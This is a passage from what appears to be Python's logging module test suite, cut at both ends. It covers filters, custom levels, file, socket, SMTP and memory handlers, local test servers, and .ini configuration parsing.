def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
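        # A background thread repeatedly deletes the log file while records are
        # emitted, exercising WatchedFileHandler's reopen-on-change logic.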
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
    :param bind_and_activate: If True (the default), binds the server and
                              starts it listening. If False, you need to call
                              :meth:`server_bind` and :meth:`server_activate`
                              at some later time before calling :meth:`start`,
                              so that the server will set up the socket and
                              listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
    :param bind_and_activate: If True (the default), binds the server and
                              starts it listening. If False, you need to call
                              :meth:`server_bind` and :meth:`server_activate`
                              at some later time before calling :meth:`start`,
                              so that the server will set up the socket and
                              listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
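        # SocketHandler frames each record as a 4-byte big-endian length prefix
        # followed by a pickled dict of the LogRecord's attributes.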
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
